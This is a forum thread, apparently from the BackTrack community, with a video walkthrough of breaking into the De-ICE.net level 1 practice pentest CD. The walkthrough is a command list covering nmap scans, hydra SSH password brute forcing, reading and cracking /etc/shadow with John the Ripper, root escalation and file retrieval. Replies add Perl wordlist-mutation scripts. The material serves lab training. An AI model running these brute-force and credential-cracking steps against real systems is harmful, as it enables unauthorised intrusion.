Results 1 to 8 of 8

Thread: [Video] De-ICE.net v1.1 (1.100) {Level 1 - Disk 2}

Hybrid View

  1. #1
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Lightbulb [Video] De-ICE.net v1.0 (1.100) {Level 1 - Disk 1}

    De-ICE.net v1.0 (1.100) {Level 1 - Disk 1}
    NOT DISK 2
    Links
    Watch video on-line: http://g0tmi1k.blip.tv/file/3194722
    Download video: http://www.mediafire.com/?994f2o5ekdqqpzm



    What is this?
    This is my walk though of how I broke into the De-ICE.net network, level 1, disk 1.
    The De-ICE.net network is on a "live PenTest CD", that creates a target(s) on which to practise penetration testing; it has an "end goal" to reach.



    What do I need?

    > BackTrack 4 (Final)
    > de-ice.net-1.100-1.0.iso (MD5: a3341316ca9860b3a0acb06bdc58bbc1)
    > Dictionary(s)




    Software
    Name: De-ICE.net
    Version: 1.0 (Level 1 - Disk 1 - IP Address: 1.100)
    Home Page: http://www.de-ice.net or http://heorot.net/livecds/
    Download Link:


    Forums/Support: http://forums.heorot.net andhttp://forums.heorot.net/viewtopic.php?f=16&t=13
    WiKi/Support: http://de-ice.net/hackerpedia/index...._PenTest_Disks




    Commands:
    Code:
     nmap -n 192.168.1.1-255
    
    nmap -n -sS -sV -O 192.168.1.100
    
    firefox 192.168.1.100
    
    [+]kate -> make list of possible usernames. Save. Filename: usernames
    // lastF, fLast
    
    hydra 192.168.1.100 ssh2 -L /root/usernames -p password -e s
    
    ssh bbanter@192.168.1.100
    // "Yes" if quiz about trusting authenticity. Password: bbanter
    
    cd /etc/
    
    cat passwd
    
    [+]kate -> Update usernames. Save.
    
    cat group
    
    exit
    
    cd /root/tools/dictionary/
    
    cat common-1 common-2 common-3 common-4 wordlist.txt >> /root/passwords
    
    hydra 192.168.1.100 ssh2 -V -l aadams -P /root/passwords
    
    ssh aadams@192.168.1.100
    // Password: nostradamus
    
    cd /etc/
    
    sudo cat shadow
    // Password: nostradamus
    
    [+]kate -> New -> Paste -> Save. Filename: shadow
    
    exit
    
    john
    
    ./john --rules --wordlist=/root/passwords --users=root /root/shadow
    // Password: tarot
    
    ssh aadams@192.168.1.100
    // Password: nostradamus
    
    su
    // Password: tarot
    
    ls -a
    
    cd ..
    
    
    
    ls -a
    
    cd ftp
    /
    
    ls -a
    
    cd incoming/
    
    ls -a
    
    openssl enc -d -aes-128-cbc -in salary_dec2003.csv.enc -out salary.csv -k tarot
    
    cd /etc/
    
    vi vsftpd.conf
    // edit (by pressing i) vsftpd.conf to have a '#' in front of 'listen=YES' (last line). Then save it (:w), and exit (:quit)
    
    modprobe capability
    
    exit
    
    exit
    
    ftp 192.168.1.100
    // User: root. Password: tarot
    
    ls -a
    
    
    
    cd ..
    
    
    ls -a
    
    
    
    cd home
    
    
    
    ls -a
    
    
    
    cd ftp
    
    
    
    ls -a
    
    
    
    cd incoming
    
    
    
    ls -a
    
    
    get salary.csv
    
    
    
    cd /pentest/passwords/jtr
    
    ls
    
    
    
    mv salary.csv ~
    
    [+]kate -> salary.csv
    
    // GAME OVER
    
    
    
    ----------------------------------------------------------------------------------------------------
    Users
    root:tarot           = root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0:::::
    aadams:nostradamus   = aadams:$1$6cP/ya8m$2CNF8mE.ONyQipxlwjp8P1:13550:0:99999:7:::
    bbanter:bbanter      = bbanter:$1$hl312g8m$Cf9v9OoRN062STzYiWDTh1:13550:0:99999:7:::
    ccoffee:hierophant   = ccoffee:$1$nsHnABm3$OHraCR9ro.idCMtEiFPPA.:13550:0:99999:7:::
    ----------------------------------------------------------------------------------------------------
    Notes:
    Song: Aly & Fila - Khepera
    Video length: 04:11
    Capture length: 08:52

    Blog Post: http://g0tmi1k.blogspot.com/2010/02/...-1-disk-1.html
    Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/1662-%5Bvideo%5D-de-ice-net-v1-1-1-100-%7Blevel-1-disk-2%7D.html ORhttp://heorot.net/forums/viewtopic.php?f=16&t=367
    Dictionaries: http://g0tmi1k.blogspot.com/2010/02/...tionaries.html
    Last edited by g0tmi1k; 03-06-2011 at 11:40 PM.
    Have you...g0tmi1k?

  2. #2
    Junior Member
    Join Date
    Apr 2010
    Location
    Sweden
    Posts
    35

    Default Re: [Video] De-ICE.net v1.1 (1.100) {Level 1 - Disk 2}

    Good job. Thanks for submitting this. There's one of the last steps I don't understand though.

    Code:
    openssl enc -d -aes-128-cbc -in salary_dec2003.csv.enc -out salary.csv -k tarot
    How did you find out what encryption the file had? Also, out of curiosity, did you just assume the root password was the right key from the beginning or did you brute force this as well before?

    Would be grateful for an answer!

  3. #3
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Video] De-ICE.net v1.1 (1.100) {Level 1 - Disk 2}

    Quote Originally Posted by randalth0r View Post
    Good job. Thanks for submitting this. There's one of the last steps I don't understand though.

    Code:
    openssl enc -d -aes-128-cbc -in salary_dec2003.csv.enc -out salary.csv -k tarot
    How did you find out what encryption the file had? Also, out of curiosity, did you just assume the root password was the right key from the beginning or did you brute force this as well before?

    Would be grateful for an answer!
    Trial and error with a bit of googling
    and after JTR told me what it thought the root password was, I went with it.
    Have you...g0tmi1k?

  4. #4
    Just burned his ISO
    Join Date
    May 2008
    Posts
    14

    Default Re: [Video] De-ICE.net v1.1 (1.100) {Level 1 - Disk 2}

    Nice work, I'm going to have a go at one of the disks once I get it downloaded.

    Where are those wordlists you found?

  5. #5
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    8

    Default Re: [Video] De-ICE.net v1.1 (1.100) {Level 1 - Disk 2}

    Quote Originally Posted by rshift View Post
    Nice work, I'm going to have a go at one of the disks once I get it downloaded.

    Where are those wordlists you found?
    rshift, he's hosting his wordlists on mediafire, u can find links on his blog @ g0tmi1k dot blogspot dot com and search for "February Update - ISOs and Dictionaries"

    g0tmi1k i see that you cut and paste your usernames' last letter to the beginning for added brute force possibilities. here are two ways to do it with perl.. also a capitalization switcher for the first letter of each word.. theres probably a much easier way to code these but im new to perl and just did it for the challenge. i didnt bother using filehandles in the script to save output to a new file u can just redirect it on command line...


    One way to do it:
    Code:
    #! /usr/bin/perl
    # Usage: perl <filename.pl> <userlist>
    # moves last character of a word to the beginning.
    
    while (<>) {
         print $_;
         chomp $_;
         $char=(chop $_);
         $str=$_;
         print "$char$str\n";
    }
    Another way:
    Code:
    #! /usr/bin/perl
    # Usage: perl <filename.pl> <userlist>
    # moves last character of a word to the beginning.
    	print $_;
    	$len = length $_;
    	$len = $len-2;
    	$last_letter = substr($_, $len, 1);
    	$first_letters = substr($_, 0, $len);
    	print "$last_letter$first_letters\n";
    }
    This will change the first letter of each word from upper to lowercase and vice versa.
    Code:
    #! /usr/bin/perl
    # Usage: perl <filename.pl> <userlist>
    while (<>) {
            print;
            @chars = split '', $_;
            $char = shift(@chars);
            if ($char =~ /[A-Za-z]/) {
                    $char =~ tr/A-Za-z/a-zA-Z/;
                    unshift(@chars, $char);
                    print @chars;
            } else {
            }
    }
    Last edited by mastodongle; 07-11-2010 at 06:04 PM.

  6. #6
    Just burned his ISO
    Join Date
    Jul 2010
    Posts
    2

    Default Re: [Video] De-ICE.net v1.1 (1.100) {Level 1 - Disk 2}

    mastodongle, here's an easier way to toggle first letter caps, no need for if/else or variables

    Code:
    #! /usr/bin/perl
    # usage: perl <filename.pl> <userlist>
    while (<>) {
            s/(^\w)/\u$1/gi;
            print;
            s/(^\w)/\l$1/gi;
            print;
    }
    Last edited by micawber; 07-26-2010 at 04:51 PM.

  7. #7
    Just burned his ISO tyl3rs123's Avatar
    Join Date
    Aug 2010
    Posts
    7

    Default Re: [Video] De-ICE.net v1.1 (1.100) {Level 1 - Disk 2}

    Quote Originally Posted by g0tmi1k View Post
    Trial and error with a bit of googling
    and after JTR told me what it thought the root password was, I went with it.
    lol ??????? that is the magic ?

  8. #8
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Video] De-ICE.net v1.1 (1.100) {Level 1 - Disk 2}

    Quote Originally Posted by rshift View Post
    Nice work, I'm going to have a go at one of the disks once I get it downloaded.

    Where are those wordlists you found?
    Im hosting them on my blog:
    g0tmi1k: [Site News] February Update - ISOs and Dictionaries

    Quote Originally Posted by mastodongle View Post
    rshift, he's hosting his wordlists on mediafire, u can find links on his blog @ g0tmi1k dot blogspot dot com and search for "February Update - ISOs and Dictionaries"

    g0tmi1k i see that you cut and paste your usernames' last letter to the beginning for added brute force possibilities. here are two ways to do it with perl.. also a capitalization switcher for the first letter of each word.. theres probably a much easier way to code these but im new to perl and just did it for the challenge. i didnt bother using filehandles in the script to save output to a new file u can just redirect it on command line...


    One way to do it:
    Code:
    #! /usr/bin/perl
    # Usage: perl <filename.pl> <userlist>
    # moves last character of a word to the beginning.
    
    while (<>) {
         print $_;
         chomp $_;
         $char=(chop $_);
         $str=$_;
         print "$char$str\n";
    }
    Another way:
    Code:
    #! /usr/bin/perl
    # Usage: perl <filename.pl> <userlist>
    # moves last character of a word to the beginning.
    	print $_;
    	$len = length $_;
    	$len = $len-2;
    	$last_letter = substr($_, $len, 1);
    	$first_letters = substr($_, 0, $len);
    	print "$last_letter$first_letters\n";
    }
    This will change the first letter of each word from upper to lowercase and vice versa.
    Code:
    #! /usr/bin/perl
    # Usage: perl <filename.pl> <userlist>
    while (<>) {
            print;
            @chars = split '', $_;
            $char = shift(@chars);
            if ($char =~ /[A-Za-z]/) {
                    $char =~ tr/A-Za-z/a-zA-Z/;
                    unshift(@chars, $char);
                    print @chars;
            } else {
            }
    }
    Thanks for helping out (with the links & script)
    Yeah, thinking about it. I should of created/used a script for the video. *Ill use them next time as Ive added them to my collection!*


    Quote Originally Posted by micawber View Post
    mastodongle, here's an easier way to toggle first letter caps, no need for if/else or variables

    Code:
    #! /usr/bin/perl
    # usage: perl <filename.pl> <userlist>
    while (<>) {
            s/(^\w)/\u$1/gi;
            print;
            s/(^\w)/\l$1/gi;
            print;
    }
    Handy to know!


    Quote Originally Posted by tyl3rs123 View Post
    lol ??????? that is the magic ?
    Sure?
    Have you...g0tmi1k?

Similar Threads

  1. Installing nVidia Video Cards
    By xX_Spiidey_Xx in forum BackTrack Howtos
    Replies: 30
    Last Post: 04-13-2011, 09:01 PM
  2. [Video] De-ICE.net v1.0 (1.110) {Level 1 - Disk 1}
    By g0tmi1k in forum BackTrack Videos
    Replies: 9
    Last Post: 03-06-2011, 11:38 PM
  3. creating BT4 USB persistent video
    By jimmy in forum Beginners Forum
    Replies: 0
    Last Post: 02-12-2010, 11:45 PM
  4. mount hard disk
    By avatar in forum Beginners Forum
    Replies: 1
    Last Post: 02-01-2010, 10:31 AM
  5. Video Capture Software
    By sprouty in forum Beginners Forum
    Replies: 4
    Last Post: 01-25-2010, 11:16 AM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •